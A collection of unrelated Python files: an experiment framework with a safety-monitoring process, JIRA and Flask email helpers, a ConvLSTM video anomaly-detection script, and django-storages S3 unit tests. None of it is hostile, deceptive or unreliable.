self.safety_check_interval = safety_check_interval
self.exception_manager = SharedMemoryManager(address=EXCEPTION_SERVER_ADDRESS, own=True)
self.stop_event = None
self.finish_event = None
self.safety_event = None
self.barrier = None
self.safety_process = None
self.safety_tests = []
for test in safety_tests:
self.safety_tests.append(test())
def start(self):
try:
self._setup()
assert self.stop_event is not None
assert self.safety_event is not None
# Run an initial test before starting continuous monitoring.
# NOTE: These initial tests will always raise upon failure, irrespective of a test's max_consecutive_failures.
self.check_safety(force_raise=True)
# Start continuous monitoring.
self.safety_process = Process(target=self.safety_monitor, name="Safety Test Monitor", args=(self.barrier,))
self.safety_process.start() # NOTE: This will need to be joined.
# print(f" ### Safety tests monitored on PID: {self.safety_process.pid}")
self.log.info(f"Continuously monitoring safety tests... (on PID: {self.safety_process.pid})")
# Don't return until continuous monitoring has started.
self.barrier.wait()
return self
except Exception:
try:
try:
self.log.exception("The testbed encountered the following error(s):")
finally:
# NOTE: __exit__() is not called if this func raises.
self._teardown()
finally:
raise
def stop(self):
return self._teardown()
def __enter__(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.stop()
finally:
if exc_type:
self.log.exception("The testbed encountered the following error(s):")
def _setup(self):
""" Setup the necessary exception manager server and run safety check monitor.
Override this to start and context manage any and all other servers.
"""
# Start server to catch and manage exceptions from parallel processes.
self.exception_manager.start() # NOTE: This is joined in self._teardown().
self.stop_event = self.exception_manager.get_event(STOP_EVENT)
self.finish_event = self.exception_manager.get_event(FINISH_EVENT)
self.safety_event = self.exception_manager.get_event(SAFETY_EVENT)
self.barrier = self.exception_manager.get_barrier(SAFETY_BARRIER, parties=2)
def check_safety(self, *args, **kwargs):
self.log.info("Running safety tests...")
for safety_test in self.safety_tests:
try:
safety_test.do_check(*args, **kwargs)
except Exception:
# NOTE: This order is critical such that self.safety_event is set before self.stop_event.wait() wakes.
self.safety_event.set()
self.stop_event.set()
# self.finish_event.set() # This is set in self._teardown().
raise
self.log.info("All Safety tests passed!")
def safety_monitor(self, barrier):
""" Monitor all safety checks.
NOTE: This is run on a child process.
"""
self.init_log()
barrier.wait()
while not self.stop_event.wait(self.safety_check_interval):
# NOTE: Upon failure, self.check_safety(), sets both self.safety_event and self.stop_event, and raises a
# SafetyException (in that order).
self.check_safety()
def _teardown(self):
""" Override this to stop/join/shutdown any and all other servers started by setup(). """
try:
try:
try:
if self.log:
self.log.info(" Cleaning up (teardown)...")
finally:
# Stop the safety monitor process so that it can be joined.
# NOTE: This will also stop EVERYTHING else - no safety := no experiment(s).
if self.stop_event:
self.stop_event.set()
self.finish_event.set()
finally:
if self.safety_process:
self.safety_process.join(DEFAULT_TIMEOUT)
finally:
# Shutdown the exception handler manager.
# NOTE: self.stop_event and self.safety_event are local to the exception manager server process and
# will not be accessible post shutdown.
if self.exception_manager is not None:
self.exception_manager.shutdown()
def init_path(self):
""" Set up output. """
pass
def init_log(self):
""" Initialize log writing.
Override to setup log handlers etc.
"""
self.log = logging.getLogger()
class Experiment:
"""
Base class that instills safety monitoring into any class that inherits it. Subclasses
need to implement a function called "experiment()".
"""
name = None
log = logging.getLogger()
data_log = datalogging.get_logger(__name__)
def __init__(self, output_path=None, suffix=None, stop_all_on_exception=True, run_forever=False,
disable_shared_memory=False, daemon=None):
""" Initialize attributes common to all Experiments.
All child classes should implement their own __init__ and call this via super()
Parameters
----------
output_path: str, optional
Output directory to write all files to (or to subdirectories thereof).
For the vast majority of use cases this should be left as None, in which
case it will be auto-generated based on date-time + suffix.
suffix : str, optional
Descriptive string to include as part of the path.
run_forever : bool, optional
Allows the experiment to continue running even when concurrent experiments have set the global stop event.
It will, however, stop for a safety event.
stop_all_on_exception : bool, optional
Allows peripheral concurrent experiments to run and fail, for example, from syntax errors without stopping
all other experiments.
disable_shared_memory : bool, optional
Disable shared memory. When True some peripheral shared memory will still exist and the main
experiment will run on the parent process. When False, the main experiment is run on a child process.
daemon : bool, optional
Passed to underlying Process that experiment is run on. See multiprocessing.Process for details.
"""
if self.name is None:
self.name = self.__class__.__name__
self.output_path = output_path
self.suffix = suffix
self.stop_all_on_exception = stop_all_on_exception
self.run_forever = run_forever
self.disable_shared_memory = disable_shared_memory
self.daemon = daemon
self.exception_manager = SharedMemoryManager(address=EXCEPTION_SERVER_ADDRESS, own=False)
self.experiment_process = None
self.safety_event = None
self._event_monitor_barrier = None
self._kill_event_monitor_event = None
# NOTE: STOP_EVENT uses a KeyboardInterrupt (SIGINT) to stop the experiment in its tracks, i.e., effectively
# immediately. Doing so, however, will most likely cause a cascade of other errors, e.g., if something is
# interrupted whilst communicating with a server which may result in the server itself shutting down thus
# stopping any subsequent communications with it. That being said, an immediate stop of other experiments may be
# desired to ensure the resultant state of the testbed, e.g., before calling post_experiment etc.
# All devices will still be safely closed by their server contexts.
self.stop_event = None
# NOTE: For more of a "soft stop" wait on the following event for synchronising when experiments should finish.
# This is NOT waited upon anywhere in this base class. It is only set upon exception. Check for this event in
# outer loops and break if set. Here "soft" just means that it may not stop immediately but instead wait for the
# rest of the loop to finish first.
self.finish_event = None
self.pre_experiment_return = None
self.experiment_return = None
self.post_experiment_return = None
self.init_path()
self.init_log()
def join(self, *args, **kwargs):
if self.experiment_process:
self.experiment_process.join(*args, **kwargs)
def set_all_events(self):
""" Set all stop events. This will remove some contrived deadlock scenarios.
This can be overridden and custom events added, however, don't forget to call this func via super().
"""
self.stop_event.set()
self.finish_event.set()
def start(self):
""" Start the experiment on a separate process and then returns (is non-blocking, it does not wait).
It works like multiprocessing.Process.start(), a join() is thus required.
"""
# Check that we can connect from the parent process.
self.exception_manager.connect() # Needs to have already been started.
self.stop_event = self.exception_manager.get_event(STOP_EVENT)
self.safety_event = self.exception_manager.get_event(SAFETY_EVENT)
self.finish_event = self.exception_manager.get_event(FINISH_EVENT)
try:
if self.disable_shared_memory:
self.log.info(f"Running experiment on parent process (PID: {os.getpid()})...")
self.run_experiment()
else:
# Start the process to run the experiment.
self.log.info("Creating separate process to run experiment...")
self.experiment_process = Process(target=self.run_experiment, name=self.name, daemon=self.daemon)
self.experiment_process.start()
# print(f" ### Child experiment process on PID: {self.experiment_process.pid}")
self.log.info(f"{self.name} process started on PID: {self.experiment_process.pid}")
except Exception:
if self.stop_all_on_exception:
self.set_all_events()
raise
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.daemon:
self.join()
def event_monitor(self):
""" This is run on a thread on the child process running self.experiment(). It monitors events and then raises
to stop parent thread running self.experiment().
NOTE: It doesn't explicitly stop the parent process, it will implicitly stop the parent process if it's
waiting in a join() (which it needs to be).
"""
try: # This must always be running, so stop main thread upon exception.
self._event_monitor_barrier.wait() # Used to sync with the main thread so that it doesn't proceed without being monitored.
# Wait indefinitely (this is run on a daemonic thread).
if self.run_forever:
# Ignore stop_event but DON'T ignore safety_event.
self.safety_event.wait()
else:
# NOTE: self.stop_event is set upon a safety check failure as well as self.safety_event, so waiting on
# self.stop_event is effectively waiting on self.safety_event also.
self.stop_event.wait()
finally:
# NOTE: This event monitor can be killed WITHOUT raising SIGINT (as it does below) by setting
# self._kill_event_monitor_event BEFORE setting self.stop_event.
if self._kill_event_monitor_event.is_set():
return
# Interrupt the main thread with a KeyboardInterrupt exception.
raise_signal(signal.SIGINT)
def run_experiment(self):
""" Code executed on the child process. """
self.init_log()
data_log_writer = None
if not self.disable_shared_memory:
# Check that we can connect from the child process.
self.exception_manager = SharedMemoryManager(address=EXCEPTION_SERVER_ADDRESS, own=False)
self.exception_manager.connect() # Needs to have already been started.
self.stop_event = self.exception_manager.get_event(STOP_EVENT)
self.safety_event = self.exception_manager.get_event(SAFETY_EVENT)
self._event_monitor_barrier = threading.Barrier(parties=2, timeout=DEFAULT_TIMEOUT)
self._kill_event_monitor_event = threading.Event()
monitor_thread = threading.Thread(target=self.event_monitor, daemon=True)
monitor_thread.start()
try:
try: # Catches SIGINT issued, using _thread.interrupt_main(), by the event_monitor.
self._event_monitor_barrier.wait() # Wait for the monitor_thread to be ready.
# Set up data log writer
data_logger_path = os.path.join(self.output_path, self.name.replace(" ", "_").lower() + "_data_logger")
data_log_writer = datalogging.DataLogWriter(data_logger_path)
datalogging.DataLogger.add_writer(data_log_writer)
# Run pre-experiment code, e.g., open devices, run calibrations, etc.
self.log.info(f"'{self.__class__.__name__}': Experiment.pre_experiment() running...")
self.pre_experiment_return = self.pre_experiment()
self.log.info(f"'{self.__class__.__name__}': Experiment.pre_experiment() completed.")
# Run the core experiment.
self.log.info(f"'{self.__class__.__name__}': Experiment.experiment() running...")
self.experiment_return = self.experiment()
self.log.info(f"'{self.__class__.__name__}': Experiment.experiment() completed.")
# Run any post-experiment analysis, etc.
self.log.info(f"'{self.__class__.__name__}': Experiment.post_experiment() running...")
self.post_experiment_return = self.post_experiment()
self.log.info(f"'{self.__class__.__name__}': Experiment.post_experiment() completed.")
except KeyboardInterrupt:
if self.safety_event.is_set():
raise SafetyException(f"'{self.__class__.__name__}': Event monitor detected a SAFETY event before experiment completed (join root experiment and/or call teardown to retrieve safety exception).")
elif self.stop_event.is_set():
raise StopException(f"'{self.__class__.__name__}': Event monitor detected a STOP event before experiment completed (join root experiment and/or call teardown to retrieve safety exception).")
else:
# An actual ctrl-c like interrupt occurred.
raise
except (Exception, KeyboardInterrupt): # KeyboardInterrupt inherits from BaseException not Exception.
self.log.exception(f"'{self.__class__.__name__}': Exception caught during Experiment.run_experiment().")
if self.stop_all_on_exception:
# NOTE: When an exception is raised by the experiment and NOT by the event monitor we now won't to
# kill the event monitor without it calling _thread.interrupt_main(). We do this by setting
# self. _kill_event_monitor_event BEFORE setting self.stop_event. Otherwise, setting stop_event would
# cause the event monitor to call _thread.interrupt_main() thus killing the main child thread, possibly
# before Process.run has a chance to set the exception on the exception manager server.
self._kill_event_monitor_event.set()
self.set_all_events()
raise
finally:
# Stop the event monitor.
self._kill_event_monitor_event.set()
# Release data log writer
if data_log_writer:
datalogging.DataLogger.remove_writer(data_log_writer)
data_log_writer.close()
def pre_experiment(self, *args, **kwargs):
""" This is called immediately BEFORE self.experiment(). """
pass
def experiment(self, *args, **kwargs):
""" This is where the experiment gets implemented. All concrete child classes must implement this. """
def post_experiment(self, *args, **kwargs):
""" This is called immediately AFTER self.experiment(). """
pass
def init_path(self):
""" Set up experiment output. """
pass
def init_log(self):
""" Initialize log writing. """
pass
|
__init__.py
|
# -*- coding: utf-8 -*-
"""JIRA utils used internally."""
import threading
from jira.resilientsession import raise_on_error
class CaseInsensitiveDict(dict):
"""A case-insensitive ``dict``-like object.
Implements all methods and operations of
``collections.MutableMapping`` as well as dict's ``copy``. Also
provides ``lower_items``.
All keys are expected to be strings. The structure remembers the
case of the last key to be set, and ``iter(instance)``,
``keys()``, ``items()``, ``iterkeys()``
will contain case-sensitive keys. However, querying and contains
testing is case insensitive::
cid = CaseInsensitiveDict()
cid['Accept'] = 'application/json'
cid['accept'] == 'application/json' # True
list(cid) == ['Accept'] # True
For example, ``headers['content-encoding']`` will return the
value of a ``'Content-Encoding'`` response header, regardless
of how the header name was originally stored.
If the constructor, ``.update``, or equality comparison
operations are given keys that have equal ``.lower()``s, the
behavior is undefined.
"""
def __init__(self, *args, **kw):
super(CaseInsensitiveDict, self).__init__(*args, **kw)
upper_keys_list = []
for key in super(CaseInsensitiveDict, self).keys():
if key != key.lower():
upper_keys_list.append(key)
for upper_key in upper_keys_list:
self[upper_key.lower()] = self[upper_key]
self.pop(upper_key, None)
def __setitem__(self, key, value):
"""Overwrite [] implementation."""
super(CaseInsensitiveDict, self).__setitem__(key.lower(), value)
# def __iter__(self):
# return iter(self.itemlist)
# def keys(self):
# return self.itemlist
# def values(self):
# return [self[key] for key in self]
# def itervalues(self):
# return (self[key] for key in self)
def threaded_requests(requests):
for fn, url, request_args in requests:
th = threading.Thread(target=fn, args=(url,), kwargs=request_args, name=url)
th.start()
for th in threading.enumerate():
if th.name.startswith("http"):
th.join()
def json_loads(r):
raise_on_error(r)
try:
return r.json()
except ValueError:
# json.loads() fails with empty bodies
if not r.text:
return {}
raise
|
email.py
|
#!/usr/bin/env python3
# encoding: utf-8
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + '' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
model_v2.py
|
# -*- coding: utf-8 -*-
"""Model V2.0.ipynb
Written by : Aditya, Nikhil
"""
###################### Importing Libraries ###################################
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
from tqdm import tqdm
import time
import tensorflow as tf
from tensorflow.keras.models import Sequential, load_model
from tensorflow.keras.layers import ConvLSTM2D,Conv2DTranspose, LayerNormalization, BatchNormalization, TimeDistributed, Conv2D, Flatten, Dense, Dropout
import keras
import concurrent.futures
import re
import pprint
from multiprocessing import Process
###################### copy the data in the gpu memory step by step ####################
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
###################### Parameter Initialization ########################################
class Config():
def __init__(self, test_path, model_path, result_pth, train_path = None, img_size = (128, 128), batch_size = 8, mx_frm = 1600, stride = [1, 2], frm_cnt = 10, test_size = 400, epochs = 10, tst_seq = 300):
self.train_path = train_path
self.test_path = test_path
self.img_size = img_size
self.batch_size = batch_size
self.model_path = model_path
self.epochs = epochs
self.result_pth = result_pth
self.stride = stride
self.mx_frm = mx_frm
self.frm_cnt = frm_cnt
self.test_size = test_size
self.tst_seq = tst_seq
##################### Class Preprocessing Functions ###########################################
class Functions(Config):
def __init__(self):
Config.__init__(self, train_path, test_path, model_path,result_pth)
# load buffer :- frm_cnt : stores the no of frames already loaded of the current video (None represents end of current video)
# indx : stores the indx of the video which is being processed / being loaded
# total : stores the amount of video loaded.
self.load_buffer = {'frm_cnt': None, 'indx':0, 'total':0}
def load_batch(self):
'''
DOCTYPE : This function will load the training videos in a batch of size defined in class Config.
Input : None
output : Batch of augmentd and processed clips, Total no of videos loaded
'''
clips = []
a = 0
q = 0
for dir in tqdm(os.walk(train_path)):
# os.walk() returns an array and the first element of the array represents the subdirectories in our main directory and we want to load the files in the subdirectories.
# So we skip the first iteration.
a += 1
if a == 1:
continue
try:
# If the frame count is None or zero then all the frames of that video are loaded and increment video index.
if not self.load_buffer['frm_cnt']:
self.load_buffer['indx'] += 1
self.load_buffer['total'] += 1
# Produced clips according to the load buffer indx.
pth = os.path.join(dir[0], sorted(dir[2])[self.load_buffer['indx']])
clips.append(self.load_frames(pth))
except Exception as e:
print(e)
# The training directory contains two folders so this step will start loading the videos from next directory.
self.load_buffer['indx'] = 0
continue
break
return clips, self.load_buffer['total']
def load_frames(self, pth, agmt = True):
'''
DOCTYPE : This function will load a set of frame sequences from a given video.
Input = pth - path of the video, agmt - True (Will apply augmentation) / False (will not apply augmentation)
output = numpy array of frame sequences
'''
video = cv2.VideoCapture(pth)
print('\n starting video no : ',self.load_buffer['total'])
frames = []
cnt = 0
while video.isOpened:
ret, frame = video.read()
cnt += 1
# If there is any error in loading the next frame. Might be because of ending of the video.
if not ret:
print('\nTotal frames read', cnt)
self.load_buffer['frm_cnt'] = None
print("\nvideo finished.")
break
# If frm_cnt exists then the previous video was not loaded completely and it will continue the previous sequence.
if self.load_buffer['frm_cnt']:
if self.load_buffer['frm_cnt'] <= cnt:
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(img/256, self.img_size)
else:
continue
# If frm_cnt is None then it will start loading the videos from 1st frame.
else:
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(img/256, self.img_size)
#print('frame shape = ', frame.shape)
frames.append(frame.reshape([self.img_size[0], self.img_size[1], 1]))
# Specifies the maximum no of frames to be loaded
if len(frames) >= self.mx_frm:
break
# update the frm_cnt variable according to whether the video is completed or not.
if ret:
self.load_buffer['frm_cnt'] = cnt
else:
self.load_buffer['frm_cnt'] = None
video.release()
# If the no of frames loaded are less than the the of frames specified in a sequence then it will dump that sequence.
if len(frames) < self.frm_cnt:
print('video has insufficiant frames')
self.load_buffer['frm_cnt'] = None
raise
# Perform Augmentation
if agmt:
frames = self.augment(frames)
return np.array(frames)
def augment(self, frames):
'''
DOCTYPE : This function will Augment the frames according to the time series strides specified in the Config class.
Input : Sequence of frames.
Ouput : Augmented Sequence of frames.
'''
agmted = np.zeros((self.frm_cnt, self.img_size[0], self.img_size[1], 1))
clips = []
try:
for strd in self.stride:
for s in range(0, len(frames), strd):
if len(frames[s:s+self.frm_cnt]) == 10:
agmted[:,:,:,:] = frames[s:s+self.frm_cnt]
clips. append(agmted)
except:
print('Error occured in augment')
no = len(clips) % 8
print("clips dropped ",no)
clips = clips[:len(clips)-no]
return clips
def load_single_test(self):
test = np.zeros((self.test_size, self.img_size[0], self.img_size[1], 1))
for dir in os.listdir(self.test_path):
path = os.path.join(self.test_path, dir)
frames = self.load_frames(path, agmt = False)
test = frames[0:self.test_size]
del frames
return test
####################### Model Architecture ##################################
class Model(Functions):
def __init__(self):
Functions.__init__(self)
self.output1 = None
self.output = None
def anom(self):
inputs = tf.keras.layers.Input(shape=[self.frm_cnt, self.img_size[0], self.img_size[1], 1])
encode = [
self.spatial(64, (5,5), stride = 2, pading="same", cnv=True),
self.temporal(64, (3,3), pading='same'),
self.temporal(32, (3,3), pading='same')
]
decode = [
self.temporal(64, (3,3), pading='same'),
self.spatial(64,(5,5), stride = 2, pading="same", cnv = False),
self.spatial(128, (11,11), stride= 2, pading="same", cnv= False)
]
seq = tf.keras.Sequential()
x = TimeDistributed(Conv2D(128, (11, 11), strides=4, padding="same"), batch_input_shape=(None, self.frm_cnt, self.img_size[0], self.img_size[1], 1))(inputs)
x = LayerNormalization()(x)
for enc in encode:
x = enc(x)
self.output1 = x
for dec in decode:
x = dec(x)
output = TimeDistributed(Conv2D(1, (11, 11), activation="sigmoid", padding="same"))(x)
return tf.keras.Model(inputs=inputs, outputs = output)
def spatial(self, filters, filter_size,stride , cnv = True, pading="same"):
seq = tf.keras.Sequential()
if cnv:
seq.add(TimeDistributed(Conv2D(filters, filter_size, padding=pading)))
else:
seq.add(TimeDistributed(Conv2DTranspose(filters, filter_size, strides=stride, padding=pading)))
seq.add(LayerNormalization())
return seq
def temporal(self, filters, filter_size, pading = "same", return_sequence=True):
seq = tf.keras.Sequential()
seq.add(ConvLSTM2D(filters, filter_size, padding=pading, return_sequences=return_sequence))
seq.add(LayerNormalization())
return seq
def anom_type(self):
seq = Sequential()
seq.add(Flatten())
seq.add(Dense(1000, activation='relu'))
seq.add(Dropout(0.5))
seq.add(Dense(512, activation='relu'))
seq.add(Dropout(0.4))
seq.add(Dense(128, activation='relu'))
seq.add(Dropout(0.5))
seq.add(Dense(13, activation='softmax'))
return seq
def evaluate(test, typ):
'''
DOCTYPE : This function is used to returnn the result of anomaly detection algorithm.
Input : A Video sequence to check
Output : Write the prediction of the model in a txt file
'''
sz = test.shape[0] // 10
sequences = np.zeros((sz, 10, img_dim[0], img_dim[1], 1))
# apply the sliding window technique to get the sequences
cnt = 0
for i in range(0, test.shape[0], 10):
if i + 10 <= test.shape[0]:
sequences[cnt, :, :, :, :] = test[i:i+10]
cnt += 1
test = None
clip = None
# get the reconstruction cost of all the sequences
reconstructed_sequences = model.predict(sequences,batch_size=4)
sequences_reconstruction_cost = np.array([np.linalg.norm(np.subtract(sequences[i],reconstructed_sequences[i])) for i in range(0,sz)])
sa = (sequences_reconstruction_cost - np.min(sequences_reconstruction_cost)) / np.max(sequences_reconstruction_cost)
sr = 1.0 - sa
while True:
try:
fle = open(cnfg.result_pth, 'w')
break
except:
time.sleep(0.001)
print('file is busy')
continue
flag = 0
length = len(sr)
ct = 0
for i in sr:
if i <= 0.96:
ct += 1
if (ct/length )== 0.3:
flag = 1
if flag:
fle.write(typ)
print('detected anomaly')
# if (sr<=0.96).any() or (sr<=0.96).all():
# fle.write(typ)
# print('detected anomaly')
else:
fle.write('Normal')
print('Normal')
fle.close()
# #plot the regularity scores
# print(sr)
# plt.plot(sr)
# plt.ylabel('regularity score Sr(t)')
# plt.xlabel('frame t')
# plt.show()
def play2(pth):
time.sleep(7)
vid = cv2.VideoCapture(pth)
while vid.isOpened():
ret, frame = vid.read()
if not ret:
break
frame = cv2.resize(frame,(512,512))
cv2.imshow('vid', frame)
if cv2.waitKey(30) & 0xFF == ord('q'):
break
vid.release()
cv2.destroyAllWindows()
def strt_eval(argmt):
'''
DOCTYPE : This function will start sequence processing
'''
frm = argmt[0]
typ = argmt[1]
frames = np.array(frm).reshape((cnfg.tst_seq, img_dim[0], img_dim[1], 1))
evaluate(frames, typ)
return 1
def test(test_path):
'''
DOCTYPE : Load the test video from test directory.
Input : path of test Dir
output : play the video in real time along with the analysis algorithm.
'''
for pth in os.listdir(test_path):
tst_pth = os.path.join(test_path, pth)
frames = []
vid = cv2.VideoCapture(tst_pth)
n = 0
p0 = Process(target = play2, args = ([tst_pth]) )
p0.start()
while vid.isOpened():
ret, frame = vid.read()
if not ret:
break
n+= 1
time.sleep(0.030)
frm = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frm = cv2.resize(frm/256, img_dim)
frames.append(frm.reshape((img_dim[0],img_dim[1], 1)))
if n%cnfg.tst_seq == 0:
print(n)
temp = re.split(r'(\d+)', pth)[0]
frames = np.array(frames).reshape((cnfg.tst_seq, img_dim[0], img_dim[1], 1))
evaluate(frames,temp)
# n = 0
frames =[]
p0.join()
vid.release()
cv2.destroyAllWindows()
while True:
try:
fle = open(cnfg.resul_pth, 'w')
break
except:
time.sleep(0.001)
print('file is busy')
continue
fle.write('Video finished')
fle.close()
if __name__ == '__main__':
model_path = 'model_weights/anomaly_detect.h5'
result_pth = 'IRIS_WEB/IRIS-backend/public/text_files/text.txt'
test_path = 'Test'
cnfg = Config(test_path, model_path,result_pth, tst_seq = 300)
fncn = Functions()
mdl = Model()
img_dim = (128, 128)
model = mdl.anom()
model.compile(loss='mse',experimental_steps_per_execution = 50, optimizer=tf.keras.optimizers.Adam(lr=1e-4, decay=1e-5, epsilon=1e-6))
try:
model.load_weights('Model/tpu_model.h5')
print('Model loaded successfuly')
except:
print("couldn't load the weights")
# model = load_mdl()
test(test_path)
# test= fncn.load_single_test()
# evaluate(test,'Abuse')
|
test_s3boto3.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import threading
from datetime import datetime
from unittest import skipIf
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.files.base import ContentFile
from django.test import TestCase
from django.utils.six.moves.urllib import parse as urlparse
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
try:
from unittest import mock
except ImportError: # Python 3.2 and below
import mock
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode('utf-8'))
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_auto_creating_bucket(self):
self.storage.auto_create_bucket = True
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_exists_doesnt_create_bucket(self):
with mock.patch.object(self.storage, '_get_or_create_bucket') as method:
self.storage.exists('file.txt')
method.assert_not_called()
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
file_names = ["some/path/1.txt", "2.txt", "other/path/3.txt", "4.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("")
self.storage.bucket.objects.filter.assert_called_with(Prefix="")
self.assertEqual(len(dirs), 2)
for directory in ["some", "other"]:
self.assertTrue(directory in dirs,
""" "%s" not in directory list "%s".""" % (
directory, dirs))
self.assertEqual(len(files), 2)
for filename in ["2.txt", "4.txt"]:
self.assertTrue(filename in files,
""" "%s" not in file list "%s".""" % (
filename, files))
def test_storage_listdir_subdir(self):
file_names = ["some/path/1.txt", "some/2.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("some/")
self.storage.bucket.objects.filter.assert_called_with(Prefix="some/")
self.assertEqual(len(dirs), 1)
self.assertTrue('path' in dirs,
""" "path" not in directory list "%s".""" % (dirs,))
self.assertEqual(len(files), 1)
self.assertTrue('2.txt' in files,
